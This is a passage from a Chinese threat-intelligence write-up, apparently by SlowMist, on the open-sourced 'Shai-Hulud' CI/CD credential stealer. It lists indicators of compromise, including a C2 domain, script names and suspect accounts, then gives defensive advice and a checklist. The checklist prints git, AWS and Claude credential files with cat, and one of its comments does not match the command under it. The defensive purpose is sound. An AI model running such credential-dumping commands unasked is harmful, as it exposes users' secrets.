25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">C2 域名</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">git-tanstack.com</span></span></p></td></tr><tr style="height:27.25pt;"><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">C2 路径</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">/router</span></span></p></td></tr><tr style="height:27.25pt;"><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">脚</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">本名</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">opensearch_init.js</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">、</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ai_init.js</span></span></p></td></tr><tr style="height:27.25pt;"><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">包名</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">voicefromtheouterworld</span></span></p></td></tr><tr style="height:27.25pt;"><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">GitHub 搜索</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">&#34;A</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> Gift From TeamPCP&#34;</span></span></p></td></tr><tr style="height:26.5pt;"><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">可疑账号</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">agwagwagwa、headdirt、tmechen</span></span></p></td></tr></tbody></table></b><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">七、防护建议</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">7.1 对开发者</span></span></p><b style="font-weight:normal;" data-pm-slice="0 0 []"><table style="border:none;border-collapse:collapse;"><tbody><tr style="height:27.25pt;"><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">建议</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">操作</span></span></p></td></tr><tr style="height:27.25pt;"><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">检查 SSH 私钥</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">确认 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">~/.ssh/id_*</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 没有被泄露</span></span></p></td></tr><tr style="height:27.25pt;"><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">轮换 GitHub Token</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">立即更换所有 GitHub PAT</span></span></p></td></tr><tr style="height:27.25pt;"><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">审查 GitHub Actions</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">检查是否有可疑的 workflow</span></span></p></td></tr><tr style="height:27.25pt;"><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">审计 CI 环境</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">查看是否有陌生 secrets</span></span></p></td></tr><tr style="height:26.5pt;"><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">检查 Claude 配置</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">查看 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">~/.claude.json</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 是否被篡改</span></span></p></td></tr></tbody></table></b><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">7.2 对企业</span></span><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.35555555555555557" data-type="png" data-w="1080" height="213" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021283" src="https://wechat2rss.xlab.app/img-proxy/?k=470bd59e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCJ4xSbCToScr3ZicrfQOd5DVB2SJZY4J24MH396lHYESrMpJLGgwpu6lvDV9iaIhAsCBnJTKIZzNHdUw8cn4tUiaa77gVcIfqsWvw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></b></b></b></p><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">7.3 快速检查清单</span></span></p></b></b></b></b></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="bash"><code><span leaf=""><span class="code-snippet__comment"># 检查 GitHub Actions 中是否有可疑 workflow</span></span></code><br/><code><span leaf=""><span class="code-snippet__built_in">cat</span> ~/.git-credentials</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""><span class="code-snippet__comment"># 检查 SSH 私钥访问记录</span></span></code><br/><code><span leaf=""><span class="code-snippet__built_in">ls</span> -la ~/.ssh/</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""><span class="code-snippet__comment"># 检查 Claude 配置</span></span></code><br/><code><span leaf=""><span class="code-snippet__built_in">cat</span> ~/.claude.json</span></code><br/><code><span leaf=""><span class="code-snippet__built_in">cat</span> ~/.claude/mcp.json</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""><span class="code-snippet__comment"># 检查 AWS 凭证</span></span></code><br/><code><span leaf=""><span class="code-snippet__built_in">cat</span> ~/.aws/credentials</span></code><br/></pre></p><p><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">八、总结</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Shai-Hulud 开源事件是 2026 年最重要的网络安全事件之一：</span></span></p><table style="min-width:100px;"><tbody><tr><td data-colwidth="75"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">要点</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">说明</span></span></p></td></tr><tr><td data-colwidth="75"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">性质</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">专业级凭证窃取工具，针对 CI/CD 环境</span></span></p></td></tr><tr><td data-colwidth="75"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">开发者</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">具备高水平能力，使用多个伪装身份，可能与俄语地区有关</span></span></p></td></tr><tr><td data-colwidth="75"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">影响</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">从&#34;专属武器&#34;变成&#34;公共服务&#34;，任何人可部署</span></span></p></td></tr><tr><td data-colwidth="75"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">时间</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2025-2026 年开发，极新威胁</span></span></p></td></tr><tr><td data-colwidth="75"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">追踪</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">TeamPCP 组织，猫主题，多个关联账号</span></span></p></td></tr></tbody></table><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">核心警示：开源恶意软件 = 潘多拉魔盒已打开；从小团伙到群狼的时代来了，攻击者已经在行动，你准备好了吗？</span></span><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">本文由 SlowMist 威胁情报团队结合 MistEye 威胁情报系统、SlowMist Agent AI驱动分析编写，有任何问题欢迎咨询反馈。</span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 